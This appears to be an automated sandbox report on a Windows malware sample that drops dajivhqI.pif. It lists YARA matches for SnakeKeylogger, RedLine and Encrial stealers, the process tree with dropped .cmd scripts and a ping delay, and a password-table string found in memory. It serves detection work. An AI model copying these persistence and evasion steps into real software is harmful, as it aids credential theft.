Source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.dajivhqI.pif.438038.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.y79a2l1FY5.exe.212fcdd8.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.1.dajivhqI.pif.438038.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000001.881378637.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.3350716480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@13/5@3/4

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

Code function: 0_2_029C793C GetDiskFreeSpaceA,

0_2_029C793C

Source: C:\Users\user\Links\dajivhqI.pif

Code function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,

7_2_004019F0

Source: C:\Users\user\Links\dajivhqI.pif

7_2_004019F0

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

File created: C:\Users\All Users\3207.cmd

Jump to behavior

Source: C:\Users\user\Links\dajivhqI.pif	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6892:120:WilError_03

Source: C:\Users\user\Links\dajivhqI.pif	Command line argument: 08A	7_2_00413780
Source: C:\Users\user\Links\dajivhqI.pif	Command line argument: 08A	7_2_00413780
Source: C:\Users\user\Links\dajivhqI.pif	Command line argument: 08A	7_1_00413780

Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A47B000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370141662.000000002A49E000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370141662.000000002A46B000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370141662.000000002A489000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3371513149.000000002B39D000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370141662.000000002A4AA000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: y79a2l1FY5.exe	Virustotal: Detection: 58%
Source: y79a2l1FY5.exe	ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

File read: C:\Users\user\Desktop\y79a2l1FY5.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\y79a2l1FY5.exe "C:\Users\user\Desktop\y79a2l1FY5.exe"
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\3207.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\19435.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Process created: C:\Users\user\Links\dajivhqI.pif C:\\Users\\user\\Links\dajivhqI.pif
